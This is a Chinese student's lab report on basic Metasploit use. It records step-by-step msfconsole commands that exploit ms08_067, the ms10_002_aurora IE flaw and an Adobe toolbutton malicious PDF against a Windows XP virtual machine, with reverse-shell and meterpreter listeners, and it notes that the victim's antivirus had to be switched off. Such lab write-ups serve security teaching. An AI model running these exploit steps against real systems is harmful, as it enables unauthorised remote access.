码迷,mamicode.com
首页 > 其他好文 > 详细

20154332_Exp5_MSF基础应用

时间:2018-04-19 17:41:03      阅读:136      评论:0      收藏:0      [点我收藏+]

标签:image   基础   tcp   根据   form   button   开启   服务器   打补丁   

准备阶段
  • 在安装好window XP的虚拟机后查看靶机IP:192.168.160.130

技术分享图片

  • kali IP:192.168.160.128

技术分享图片

1、主动攻击:ms08_067
  • 先使用msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
    由此图可知:

技术分享图片

  • 使用这个模块,show targets查看可以被攻击的靶机的操作系统型号:
    技术分享图片
  • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
    show payloads,

技术分享图片

  • 我们想要获取靶机的shell
    set payload generic/shell_reverse_tcp

技术分享图片

  • 查看配置渗透攻击所需的配置项show options

技术分享图片

  • 通过上述操作,可以让我们知道有哪些参数需要进行配置
    set LHOST 192.168.160.128 //设置kali攻击IP,
    set RHOST 192.168.160.130 //设置靶机IP

技术分享图片

  • 设置相应平台的编号:set target 0
    此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台

  • 发起渗透攻击 exploit获取shell如下图所示
    技术分享图片
  • 来看看靶机的ip

技术分享图片
成功!
---

2、MS10_002_aurora漏洞攻击
  • 同上,先使用msfconsole进入msf,再用search MS10_002_aurora查询一下针对该漏洞的攻击模块: 由此图可知:
    技术分享图片
  • 使用这个攻击模块use exploit/windows/browser/ms10_002_aurora
    并获取靶机的shell set payload generic/shell_reverse_tcp
    技术分享图片

  • 将服务器端口设为set SRVPORT 80
    查看配置渗透攻击所需的配置项 show options
    技术分享图片
  • set LHOST 192.168.160.128 //设置kali攻击IP,
  • set SRVHOST 192.168.160.128

技术分享图片

  • 发起渗透攻击 exploit

技术分享图片

  • 成功生成了一个URL,在靶机的IE下访问。

技术分享图片

  • 再回到kali中查看,如图所示,成功!

技术分享图片

  • 尝试输入指令,成功。

技术分享图片

  • 获得靶机ip

技术分享图片

3. 对Adobe的漏洞攻击:adobe_toolbutton
  • 同上,先使用msfconsole进入msf,再用search adobe查询一下针对该漏洞的攻击模块,选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块

技术分享图片

  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版)可以看到适合这个漏洞的版本:
    技术分享图片

  • set LHOST 192.168.160.128
    //kali ip
  • set LPORT 4332
  • set FILENAME 20154332.pdf//文件命名

  • 设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

技术分享图片

  • 将pdf文件拷贝进入靶机中,进行回连依次输入

技术分享图片

  • use exploit/multi/handler
    set payload
  • windows/meterpreter/reverse_tcp
  • set LHOST 192.168.160.128
  • set LPORT 4332
  • exploit
  • 第一次失败,因为靶机上开启了杀毒软件,

技术分享图片

  • 关闭后再次尝试,

技术分享图片

  • 尝试输入指令,成功!!!

技术分享图片


4、辅助模块应用
  • 使用show auxiliary查看可以运用的辅助模块。

  • 先使用msfconsole进入msf,再用show auxiliary查看可以运用的辅助模块。由此图可知:

技术分享图片

  • 我使用的是use scanner/ip/ipidseq

技术分享图片

  • 用info查看一下需要更改的参数

技术分享图片

  • 更改成靶机ip后再次查看一下

技术分享图片

  • 创建完成

技术分享图片

  • 运行一下

技术分享图片

  • 成功!!!

基础问题回答:

(1)用自己的话解释什么是exploit,payload,encode.
  • exploit,就是可以利用漏洞去攻击,生成或启动已经设置好的攻击程序,获得相应权限。
  • payload,真正具有攻击性的代码包装成可插入到目标主机。
  • encode通过编码改变特征码。

实践总结与体会

这次的实验在发现漏洞,并根据此漏洞获取权限,在实验过程中可以发现,这些漏洞都是很早之前的漏洞,在一些新版本上根本使用不了,新版本已经有了改进,所以对实验中对软件的版本有很大的要求。
通过这次实验了解到漏洞如此之多,以后需要常打补丁,时常更新。

20154332_Exp5_MSF基础应用

标签:image   基础   tcp   根据   form   button   开启   服务器   打补丁   

原文地址:https://www.cnblogs.com/renqing/p/8884537.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!